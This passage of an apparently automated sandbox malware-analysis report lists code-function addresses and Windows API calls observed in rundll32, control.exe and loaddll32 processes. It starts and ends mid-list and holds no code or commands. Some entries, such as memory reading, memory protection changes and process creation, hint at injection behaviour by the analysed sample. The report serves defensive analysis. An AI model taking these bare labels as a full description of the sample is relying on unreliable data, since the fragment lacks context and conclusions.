          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_06002A0A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_06002A0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0600A818 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,1_2_0600A818
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_06003934 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,1_2_06003934
          Source: C:\Windows\System32\control.exeCode function: 37_2_00509B4C NtQueryInformationProcess,37_2_00509B4C
          Source: C:\Windows\System32\control.exeCode function: 37_2_004EF640 NtQueryInformationToken,NtQueryInformationToken,NtClose,37_2_004EF640
          Source: C:\Windows\System32\control.exeCode function: 37_2_00521002 NtProtectVirtualMemory,NtProtectVirtualMemory,37_2_00521002
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_06002410 CreateProcessAsUserW,1_2_06002410
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D21A40_2_6E4D21A4
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E9AD70_2_6E4E9AD7
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4F0EB00_2_6E4F0EB0
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E477E0_2_6E4E477E
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4F13F40_2_6E4F13F4
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EA78C0_2_6E4EA78C
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EA3800_2_6E4EA380
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4E9FAC0_2_6E4E9FAC
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EABAC0_2_6E4EABAC
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4EC0E80_2_6E4EC0E8
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4F309D0_2_6E4F309D
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4F19380_2_6E4F1938
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_032EAF341_2_032EAF34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_032E28E91_2_032E28E9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_060136041_2_06013604
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_060216691_2_06021669
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_060126781_2_06012678
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_060276B01_2_060276B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0601CFA31_2_0601CFA3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_06023C5C1_2_06023C5C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0601BC931_2_0601BC93
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0600C3071_2_0600C307
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0600BBA11_2_0600BBA1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_060148041_2_06014804
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0602086C1_2_0602086C
          Source: C:\Windows\System32\control.exeCode function: 37_2_004F589037_2_004F5890
          Source: C:\Windows\System32\control.exeCode function: 37_2_004F6B8037_2_004F6B80
          Source: C:\Windows\System32\control.exeCode function: 37_2_004F285437_2_004F2854
          Source: C:\Windows\System32\control.exeCode function: 37_2_004F386C37_2_004F386C
          Source: C:\Windows\System32\control.exeCode function: 37_2_004F206C37_2_004F206C
          Source: C:\Windows\System32\control.exeCode function: 37_2_004FE80837_2_004FE808
          Source: C:\Windows\System32\control.exeCode function: 37_2_0050E03837_2_0050E038
          Source: C:\Windows\System32\control.exeCode function: 37_2_004E78F037_2_004E78F0
          Source: C:\Windows\System32\control.exeCode function: 37_2_0050E09C37_2_0050E09C
          Source: C:\Windows\System32\control.exeCode function: 37_2_004F11DC37_2_004F11DC
          Source: C:\Windows\System32\control.exeCode function: 37_2_004E49BC37_2_004E49BC
          Source: C:\Windows\System32\control.exeCode function: 37_2_0050FA1037_2_0050FA10
          Source: C:\Windows\System32\control.exeCode function: 37_2_00506A2837_2_00506A28
          Source: C:\Windows\System32\control.exeCode function: 37_2_004E42CC37_2_004E42CC
          Source: C:\Windows